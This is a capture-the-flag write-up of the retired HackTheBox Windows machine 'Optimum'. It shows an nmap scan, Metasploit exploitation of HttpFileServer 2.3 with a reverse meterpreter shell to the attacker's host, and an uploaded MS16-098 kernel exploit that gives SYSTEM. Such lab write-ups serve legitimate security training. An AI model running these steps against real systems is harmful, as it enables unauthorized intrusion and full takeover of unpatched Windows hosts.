HackTheBox: Optimum
This is a retired beginner-level machine from hackthebox. It is a windows machine, which I really need more practice at…
Scanning:
Find running services:
crazyeights@es-base:~$ nmap -PS 10.10.10.8
Starting Nmap 7.80 ( https://nmap.org ) at 2021-01-15 10:42 EST
Nmap scan report for 10.10.10.8
Host is up (0.034s latency).
Not shown: 999 filtered ports
PORT STATE SERVICE
80/tcp open http
Port 80:
In the page source we find the server publisher name:
HttpFileServer 2.3
There are exploits for this version:
Trying the metasploit version:
msf5> search rejetto
0 exploit/windows/http/rejetto_hfs_exec 2014-09-11 excellent Yes Rejetto HttpFileServer Remote Command Execution
msf5 > use 0
[*] No payload configured, defaulting to windows/meterpreter/reverse_tcp
msf5 exploit(windows/http/rejetto_hfs_exec) > options
msf5 exploit(windows/http/rejetto_hfs_exec) > set LHOST 10.10.14.25
LHOST => 10.10.14.25
msf5 exploit(windows/http/rejetto_hfs_exec) > set RHOSTS 10.10.10.8
RHOSTS => 10.10.10.8
msf5 exploit(windows/http/rejetto_hfs_exec) > exploit
User
After running the exploit we now have user:
meterpreter > getuid
Server username: OPTIMUM\kostas
meterpreter >
We can now get the user flag:
meterpreter > pwd
C:\Users\kostas\Desktop
meterpreter > dir
100444/r--r--r-- 32 fil 2017-03-18 08:13:18 -0400 user.txt.txt
meterpreter > cat user.txt.txt
d0c39_i_dont_want_to_get_in_trouble
Listing system info:
meterpreter > sysinfo
Computer : OPTIMUM
OS : Windows 2012 R2 (6.3 Build 9600).
Architecture : x64
System Language : el_GR
Domain : HTB
Logged On Users : 1
Meterpreter : x86/windows
This version of the OS has an vulnerability that will allow us to elevate our privileges.
Found the link to the repo with the exploit exe at the first link, and the exec at the second.
https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Windows%20-%20Privilege%20Escalation.md
https://github.com/SecWiki/windows-kernel-exploits/tree/master/MS16-098
Root
Upload and run the exploit to get system:
meterpreter > upload Downloads/bfill.exe
[*] uploading : Downloads/bfill.exe -> bfill.exe
[*] Uploaded 547.00 KiB of 547.00 KiB (100.0%): Downloads/bfill.exe -> bfill.exe
[*] uploaded : Downloads/bfill.exe -> bfill.exe
meterpreter > shell
Process 1828 created.
Channel 12 created.
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas>bfill.exe
bfill.exe
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.
C:\Users\kostas>whoami
whoami
nt authority\system
C:\Users\kostas>
The root flag can be found on the Administrator’s desktop.
C:\Users\Administrator\Desktop>type root.txt
type root.txt
51ed_i_dont_want_to_get_in_trouble
FIN. 🥳